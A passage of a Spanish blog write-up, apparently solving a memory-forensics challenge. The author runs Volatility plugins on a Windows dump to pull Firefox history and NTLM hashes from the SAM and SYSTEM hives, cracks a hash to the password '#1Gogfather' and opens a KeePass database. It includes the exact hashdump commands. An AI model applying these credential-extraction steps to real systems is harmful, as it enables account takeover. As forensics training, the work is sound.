" o:spid="_x0000_s1029" strokecolor="red" strokeweight="1pt" style="height: 6.6pt; left: 0px; margin-left: -33.05pt; margin-top: 73.85pt; mso-height-percent: 0; mso-height-relative: margin; mso-position-horizontal-relative: text; mso-position-horizontal: absolute; mso-position-vertical-relative: text; mso-position-vertical: absolute; mso-wrap-distance-bottom: 0; mso-wrap-distance-left: 9pt; mso-wrap-distance-right: 9pt; mso-wrap-distance-top: 0; mso-wrap-style: square; position: absolute; text-align: left; v-text-anchor: middle; visibility: visible; width: 247.15pt; z-index: 251665408;"><v:shape id="Picture_x0020_38" o:spid="_x0000_s1028" style="height: 130.95pt; left: 0px; margin-left: 228.75pt; margin-top: 12.3pt; mso-height-percent: 0; mso-height-relative: page; mso-position-horizontal-relative: text; mso-position-horizontal: absolute; mso-position-vertical-relative: text; mso-position-vertical: absolute; mso-width-percent: 0; mso-width-relative: page; mso-wrap-distance-bottom: 0; mso-wrap-distance-left: 9pt; mso-wrap-distance-right: 9pt; mso-wrap-distance-top: 0; mso-wrap-style: square; position: absolute; text-align: left; visibility: visible; width: 211.4pt; z-index: 251664384;" type="#_x0000_t75">
<v:imagedata o:title="" src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image010.png">
<w:wrap type="square">
</w:wrap></v:imagedata></v:shape><v:shape id="Picture_x0020_38" o:spid="_x0000_s1028" style="height: 130.95pt; left: 0px; margin-left: 228.75pt; margin-top: 12.3pt; mso-height-percent: 0; mso-height-relative: page; mso-position-horizontal-relative: text; mso-position-horizontal: absolute; mso-position-vertical-relative: text; mso-position-vertical: absolute; mso-width-percent: 0; mso-width-relative: page; mso-wrap-distance-bottom: 0; mso-wrap-distance-left: 9pt; mso-wrap-distance-right: 9pt; mso-wrap-distance-top: 0; mso-wrap-style: square; position: absolute; text-align: left; visibility: visible; width: 211.4pt; z-index: 251664384;" type="#_x0000_t75"><br /></v:shape></v:rect></p><p class="MsoNormal" style="text-align: justify;"><o:p> </o:p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhbtHX9BVC_DU4DISlkyEHJR6uwW0Itc_y_1279irNQof7UR5And84y7fFI-a2SinVFX_FKNB-qauJayrtGhV-iyKBJF7vmBLHK-8LBWGa-vEjNW8Z1fvmCmbhT6kdJ1fOFhGpFFWU8oIw-yuZf7I16slKYlXlmSc3mSu1SWqbGenkl-YvoajW7YWC8eQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="240" data-original-width="780" height="196" src="https://blogger.googleusercontent.com/img/a/AVvXsEhbtHX9BVC_DU4DISlkyEHJR6uwW0Itc_y_1279irNQof7UR5And84y7fFI-a2SinVFX_FKNB-qauJayrtGhV-iyKBJF7vmBLHK-8LBWGa-vEjNW8Z1fvmCmbhT6kdJ1fOFhGpFFWU8oIw-yuZf7I16slKYlXlmSc3mSu1SWqbGenkl-YvoajW7YWC8eQ=w640-h196" width="640" /></a></div><p></p><p class="MsoNormal" style="text-align: justify;">Hay una carpeta data en su
interior que no suele encontrarse en este tipo de archivos, pues bien,
accedemos a ella y descubrimos un archivo en su interior con nombre “my_safety_box”
del cual no disponemos de ninguna referencia sobre qué puede tratarse. <o:p></o:p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg6EHQl51_aD9oKvjqRTXTPfblwh6mrTF-X_8v6qfTvlKKQ6jaWgfM-acM3e5FaniNhj5Fr6DahcMHt9zdxSFE0SvJ1vi7p4y58gMI7QxKRV7DEZRhVo3DXQTbCLLo_Hbl_w1PKBO4Y9zn0NuhmRqahYDzjJhFNxYoSuZPk9bF3mVz6iN0U2QJwqKa6tg" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="359" data-original-width="886" height="260" src="https://blogger.googleusercontent.com/img/a/AVvXsEg6EHQl51_aD9oKvjqRTXTPfblwh6mrTF-X_8v6qfTvlKKQ6jaWgfM-acM3e5FaniNhj5Fr6DahcMHt9zdxSFE0SvJ1vi7p4y58gMI7QxKRV7DEZRhVo3DXQTbCLLo_Hbl_w1PKBO4Y9zn0NuhmRqahYDzjJhFNxYoSuZPk9bF3mVz6iN0U2QJwqKa6tg=w640-h260" width="640" /></a></div><br />Llegados a este punto, nos toca investigar
qué más cosas puede haber dentro de la máquina que nos permitan intuir qué
puede ser este archivo y recordé que en el pstree vi navegación de usuario a
través del navegador Firefox.<p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgFb4d4-zDQFhU4GJIIh-D_Lnxdf2TePH5K9OuSuFHdboFk68k30TzAWplDnhBpgYbdURBo1QjcF2c_3SIa24fRnkAajQrmgK88tgaXLMAKwajbXJbFd0dGpHj_viMBJ5cC3B7aWc3YRNgTftM5WQI0nFrvFJEzrq_5X3ce5GFIt9Eo4Y0EzX7WVZy_HQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="558" data-original-width="696" height="514" src="https://blogger.googleusercontent.com/img/a/AVvXsEgFb4d4-zDQFhU4GJIIh-D_Lnxdf2TePH5K9OuSuFHdboFk68k30TzAWplDnhBpgYbdURBo1QjcF2c_3SIa24fRnkAajQrmgK88tgaXLMAKwajbXJbFd0dGpHj_viMBJ5cC3B7aWc3YRNgTftM5WQI0nFrvFJEzrq_5X3ce5GFIt9Eo4Y0EzX7WVZy_HQ=w640-h514" width="640" /></a></div><br /><br /><p></p><p class="MsoNormal" style="text-align: justify;"><o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;"><v:rect filled="f" id="Rectangle_x0020_41" o:gfxdata="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
thLaMrrBEyF8BmfRqagXUeOyvl4rXWqpp0yh14PQKtVo3f6QFlf1NfDN5wYam5mCxt5J22/WGhAy
I5S0/QkMjeEySiB2hPrmQjSA45aR5OkLf5XMknAht5AIU4PrpJNmg4hIzD1Koravtl+4gcY6h2jd
qquQED5a5dYgrXxsyoHTbSfjyQSPpOl2g6Isnd5Chk9zhfOpZr86WHGyKbi7H45PvCGd8ocIQqzR
qioDjomAs4Nqas0xgcOwIpGV8TdXmLK0a55G6RhK6YgmIcoqipnMU7hO5YU6+q6wgXGX7RkMapgk
K4TDQBVY06hWNS2qRqrD0qp7PpOynJE0y5ppZRVVNd1ZzFohLwNztrxakTe0yk0MOc2s8Gnqnk+5
a3mum+sTiioBBi/s56i6FygIhmrlYpZqSuPFNKxydka1a0e+wXNUu0iRMLJ+Mxc7Z7eiRjiXA+KV
Kj/wzUctkCZ5X6kt7TrY3kOJNwyqbR8Ol2E4+Ayu4HjaB9qqoq0qGlzBmTOUi/SguO1nFzkFnqeU
AlPLKbUcU88p9ZzSyCmNnNLMKU3f0yeqcIqvDlN9Lz8whRqWHbBmvYV9+r/xLwAAAP//AwBQSwME
FAAGAAgAAAAhAJxmRkG7AAAAJAEAACoAAABjbGlwYm9hcmQvZHJhd2luZ3MvX3JlbHMvZHJhd2lu
ZzEueG1sLnJlbHOEj80KwjAQhO+C7xD2btJ6EJEmvYjQq9QHCMk2LTY/JFHs2xvoRUHwsjCz7Dez
TfuyM3liTJN3HGpaAUGnvJ6c4XDrL7sjkJSl03L2DjksmKAV201zxVnmcpTGKSRSKC5xGHMOJ8aS
GtHKRH1AVzaDj1bmIqNhQaq7NMj2VXVg8ZMB4otJOs0hdroG0i+hJP9n+2GYFJ69elh0+UcEy6UX
FqCMBjMHSldnnTUtXYGJhn39Jt4AAAD//wMAUEsBAi0AFAAGAAgAAAAhALvlSJQFAQAAHgIAABMA
AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEArTA/8cEA
AAAyAQAACwAAAAAAAAAAAAAAAAA2AQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAekHcDcIC
AABkBgAAHwAAAAAAAAAAAAAAAAAgAgAAY2xpcGJvYXJkL2RyYXdpbmdzL2RyYXdpbmcxLnhtbFBL
AQItABQABgAIAAAAIQCSfYfgHQcAAEkgAAAaAAAAAAAAAAAAAAAAAB8FAABjbGlwYm9hcmQvdGhl
bWUvdGhlbWUxLnhtbFBLAQItABQABgAIAAAAIQCcZkZBuwAAACQBAAAqAAAAAAAAAAAAAAAAAHQM
AABjbGlwYm9hcmQvZHJhd2luZ3MvX3JlbHMvZHJhd2luZzEueG1sLnJlbHNQSwUGAAAAAAUABQBn
AQAAdw0AAAAA
" o:spid="_x0000_s1026" strokecolor="red" strokeweight="1pt" style="height: 7.9pt; left: 0px; margin-left: -0.15pt; margin-top: 299.75pt; mso-position-horizontal-relative: text; mso-position-horizontal: absolute; mso-position-vertical-relative: text; mso-position-vertical: absolute; mso-wrap-distance-bottom: 0; mso-wrap-distance-left: 9pt; mso-wrap-distance-right: 9pt; mso-wrap-distance-top: 0; mso-wrap-style: square; position: absolute; text-align: left; v-text-anchor: middle; visibility: visible; width: 421.6pt; z-index: 251666432;"><span style="mso-no-proof: yes;"><v:shape id="Picture_x0020_40" o:spid="_x0000_i1044" style="height: 332.25pt; mso-wrap-style: square; visibility: visible; width: 425.25pt;" type="#_x0000_t75">
<v:imagedata o:title="" src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image013.png">
</v:imagedata></v:shape></span><o:p></o:p></v:rect></p>
<p class="MsoNormal" style="text-align: justify;">Para poder extraer la navegación
en memoria, se necesita de un plugin adicional que no se encuentra por defecto
alojado dentro de Volatility, por lo que debemos clonar un repositorio que el
usuario “superponible” ha dejado en su github.<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;">git clone </span><a href="https://github.com/superponible/volatility-plugins"><span lang="EN-US" style="mso-ansi-language: EN-US;">https://github.com/superponible/volatility-plugins</span></a><span lang="EN-US" style="mso-ansi-language: EN-US;"><o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;">Una vez obtenidos los plugins,
ejecutamos el siguiente comando:<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;">vol.py
--plugin=/home/dfir/Desktop/rootme/volatility-plugins -f dump
--profile=Win7SP1x86_23418 firefoxhistory <span style="mso-spacerun: yes;"> </span>--output=csv > firefoxhistory.csv<o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="mso-no-proof: yes;"><v:shape id="Picture_x0020_36" o:spid="_x0000_i1043" style="height: 7.5pt; mso-wrap-style: square; visibility: visible; width: 426pt;" type="#_x0000_t75">
<v:imagedata o:title="" src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image014.png">
</v:imagedata></v:shape></span><span lang="EN-US" style="mso-ansi-language: EN-US;"><o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;">Obteniendo un archivo .CSV que al
analizarlo con cualquier software que procese hojas de cálculo, nos permite ver
que el usuario realizó varias búsquedas sobre keepass.<o:p></o:p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEix5qku5WgHyHsBb6ca1NNPTY4s9VuYBvaVI6NAJI07UgdxzaM4a8GEtFhRRvAveAU669-KF727b0qQyfVkgC9OnArFRwsdhzwgzTsWQw604-UUPCce2XcbjcfBK1jE7mjXOz06v5GsxhKUHq75clF5Xs5g1s8qAANKA3f-vxkmeDCrWY3wjmtkY1uOyA" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="285" data-original-width="886" height="206" src="https://blogger.googleusercontent.com/img/a/AVvXsEix5qku5WgHyHsBb6ca1NNPTY4s9VuYBvaVI6NAJI07UgdxzaM4a8GEtFhRRvAveAU669-KF727b0qQyfVkgC9OnArFRwsdhzwgzTsWQw604-UUPCce2XcbjcfBK1jE7mjXOz06v5GsxhKUHq75clF5Xs5g1s8qAANKA3f-vxkmeDCrWY3wjmtkY1uOyA=w640-h206" width="640" /></a></div><br />Para sacarnos de dudas, usamos el
comando file de Linux con el que se nos sugiere que el tipo de archivo que
tenemos delante es una base de datos de tipo KDBX, es decir, de tipo Keepass.<p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEifDi8HOml74FmSubzGW1gTx1Hn4HIa-atJdlSi_CpNbkm75ClynY5Fde2DoGeg2yt_P4ViO_OPEdiWhxBIwsaUTB65eFK3PZ_2LMH4ti8tHH7A5l1y2Wa6b18QnMdkztKmkvG_YcFMCsZHK4z0UMYH0QWa4rhyPmFiKlyw01mvp8Y0NMRGd_q37p8A9g" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="69" data-original-width="886" height="50" src="https://blogger.googleusercontent.com/img/a/AVvXsEifDi8HOml74FmSubzGW1gTx1Hn4HIa-atJdlSi_CpNbkm75ClynY5Fde2DoGeg2yt_P4ViO_OPEdiWhxBIwsaUTB65eFK3PZ_2LMH4ti8tHH7A5l1y2Wa6b18QnMdkztKmkvG_YcFMCsZHK4z0UMYH0QWa4rhyPmFiKlyw01mvp8Y0NMRGd_q37p8A9g=w640-h50" width="640" /></a></div><br />Lo siguiente es hallar la
contraseña para poder abrir la base de datos de keepass, tras un rato revisando
la memoria se me ocurrió que se podría intentar sacar los hashes de los
usuarios del sistema y después crackearlos, ya que en la navegación del usuario
se había accedido a Crackstation.net.<p></p><p class="MsoNormal" style="text-align: justify;"><o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Para extraer los hashes, primero
necesitamos obtener las direcciones virtuales de memoria de los hives del
sistema SYSTEM y SAM, para esto debemos utilizar el plugin hivelist:<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;">vol.py -f dump --profile=Win7SP1x86_23418 hivelist<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiLrGmFUMLS5PSbzWE0q4EZjKzZpGIfwSYwEF8x4eQdB09rQJhV-j0mLV8vOmELV_speBUrgzf4dgXAkLUYkRd2GHtXD0h0cYb0rexMv5kf2N-X2yHy7Gkw4tfNt5Zn3t89wEgBDz03r-oiD3jKdatn2-qFzfJNDfRvaFWSoq0OI7kAqEMIKSeIJHXK3w" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="310" data-original-width="886" height="224" src="https://blogger.googleusercontent.com/img/a/AVvXsEiLrGmFUMLS5PSbzWE0q4EZjKzZpGIfwSYwEF8x4eQdB09rQJhV-j0mLV8vOmELV_speBUrgzf4dgXAkLUYkRd2GHtXD0h0cYb0rexMv5kf2N-X2yHy7Gkw4tfNt5Zn3t89wEgBDz03r-oiD3jKdatn2-qFzfJNDfRvaFWSoq0OI7kAqEMIKSeIJHXK3w=w640-h224" width="640" /></a></div><p></p><p class="MsoNormal" style="text-align: justify;">Una vez obtenidas las direcciones
de memoria procedemos a volcar los hashes NTLM de las contraseñas de los
usuarios, para esto utilizamos el plugin hashdump y le pasamos las direcciones
de memoria, con la opción -y la del SYSTEM y con la opción -s de la SAM.<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;">vol.py -f dump --profile=Win7SP1x86_23418
hashdump -y 0x88c1a280 -s 0x901de008<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg0P4YCt11HwTSDN5C9aJDPKCuBiBVIMexm7n5fJVij2AO-pcjttCECy8WRVDAsTGd0d3GbyJ75ASs4xltFyX0q11IPRK0TAA1FDT2umWZM6I3TvpMFjNRuu025ZEdiStN5fw9BjW0dgLdSI1IhsDR7vsNoPqPmcRISzzmpDwTJnuqw4qLOjN1ruV3w3Q" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="96" data-original-width="886" height="70" src="https://blogger.googleusercontent.com/img/a/AVvXsEg0P4YCt11HwTSDN5C9aJDPKCuBiBVIMexm7n5fJVij2AO-pcjttCECy8WRVDAsTGd0d3GbyJ75ASs4xltFyX0q11IPRK0TAA1FDT2umWZM6I3TvpMFjNRuu025ZEdiStN5fw9BjW0dgLdSI1IhsDR7vsNoPqPmcRISzzmpDwTJnuqw4qLOjN1ruV3w3Q=w640-h70" width="640" /></a></div><br />Tras obtenerlas comprobamos una por
una en Crackstarion.net obteniendo que la contraseña del usuario info es
#1Gogfather.<p></p><p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiOIYSJU-POWZSgopEOoJEYHJ2zfV-9dfVKQHhivUi2aonkVOQphab4AYp1S4-rJpjQFvcusbTtHFr_6Z8_RpLof_vfLE6jSSwVT0i1LBw6UYcGi4MwhsloJFyUd5_1uK4tkzXDXnOYI-1tbFjabLvE3bOV1cHguLm7ncKK5lkJ3Kzlk6Q9NRtYExSXCQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="349" data-original-width="886" height="252" src="https://blogger.googleusercontent.com/img/a/AVvXsEiOIYSJU-POWZSgopEOoJEYHJ2zfV-9dfVKQHhivUi2aonkVOQphab4AYp1S4-rJpjQFvcusbTtHFr_6Z8_RpLof_vfLE6jSSwVT0i1LBw6UYcGi4MwhsloJFyUd5_1uK4tkzXDXnOYI-1tbFjabLvE3bOV1cHguLm7ncKK5lkJ3Kzlk6Q9NRtYExSXCQ=w640-h252" width="640" /></a></div><br />Volvemos a la máquina Windows,
abrimos Keepass, seleccionamos el archivo y probamos a pasarle la contraseña
obtenida.<p></p><p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhapgCCk4C5up2N_s549BrpxDTVD2OoC1_7V7aZJwCSdryuxndrD4vvkmEFNwyPNzFP6qpKd0hgFbVjDZF0i6oFw22vQ-jNxS7nq4FWTZIw2IxI3DW_5DnAeZnWMfJciVIGrUGQUm5tF--rVlKeTNTExBfeVsDUmvkTrCJvYz4lCxr-2tGpB2_lKO5CCQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="235" data-original-width="422" height="178" src="https://blogger.googleusercontent.com/img/a/AVvXsEhapgCCk4C5up2N_s549BrpxDTVD2OoC1_7V7aZJwCSdryuxndrD4vvkmEFNwyPNzFP6qpKd0hgFbVjDZF0i6oFw22vQ-jNxS7nq4FWTZIw2IxI3DW_5DnAeZnWMfJciVIGrUGQUm5tF--rVlKeTNTExBfeVsDUmvkTrCJvYz4lCxr-2tGpB2_lKO5CCQ" width="320" /></a></div><br /><br /><p></p><p class="MsoNormal" style="text-align: justify;"><o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;"><span style="mso-no-proof: yes;"><v:shape id="Imagen_x0020_23" o:spid="_x0000_i1037" style="height: 112.5pt; mso-wrap-style: square; visibility: visible; width: 202.5pt;" type="#_x0000_t75">
<v:imagedata o:title="" src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image020.png">
</v:imagedata></v:shape></span><o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Y por suerte la base de datos se
abre y aparecen unos 4240 registros en la sección Internet.<o:p></o:p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhbWF2POJx6Gs7W346tk0b8_FzhWocRESdL0NXVvoFXoa1-RP0HHAswD6n-D-D1ulNb6E7XeqQ_SVRCJYf7hTj-_jScyVx_9iem5C9FdWjQIFj90q63Dw5NLy2-NGkSFv56SLuwsR7kC0crlpvJ0KdscHDXqaIwQUHpIdpaJkLCqhUUl2rqtfaBsKEoRQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="406" data-original-width="570" height="456" src="https://blogger.googleusercontent.com/img/a/AVvXsEhbWF2POJx6Gs7W346tk0b8_FzhWocRESdL0NXVvoFXoa1-RP0HHAswD6n-D-D1ulNb6E7XeqQ_SVRCJYf7hTj-_jScyVx_9iem5C9FdWjQIFj90q63Dw5NLy2-NGkSFv56SLuwsR7kC0crlpvJ0KdscHDXqaIwQUHpIdpaJkLCqhUUl2rqtfaBsKEoRQ=w640-h456" width="640" /></a></div><br />Como son demasiadas para probar
una por una las exportamos a CSV para revisarlas detenidamente.<p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhH2py1ls68l73u6yJ9VQbtZgnhp8oV9fGWpYTLBBIHZqqEEAl-dD5xtodqaw4XXl3xg2DDN0QoW9par268TnheBC9sQaZWS7GCBdAizgEPqznFp9l8j3rzBws4YFxr_1-SBgoF5NtsMhxSTaBUXuX7FYCx5ndT4H3ki38OcsGHCuVOUkauEuzsCA2BWw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="425" data-original-width="309" height="640" src="https://blogger.googleusercontent.com/img/a/AVvXsEhH2py1ls68l73u6yJ9VQbtZgnhp8oV9fGWpYTLBBIHZqqEEAl-dD5xtodqaw4XXl3xg2DDN0QoW9par268TnheBC9sQaZWS7GCBdAizgEPqznFp9l8j3rzBws4YFxr_1-SBgoF5NtsMhxSTaBUXuX7FYCx5ndT4H3ki38OcsGHCuVOUkauEuzsCA2BWw=w464-h640" width="464" /></a><span style="text-align: justify;"> </span></div><p></p>
<p class="MsoNormal" style="text-align: justify;"><o:p> </o:p>Tras pasar el texto separado por
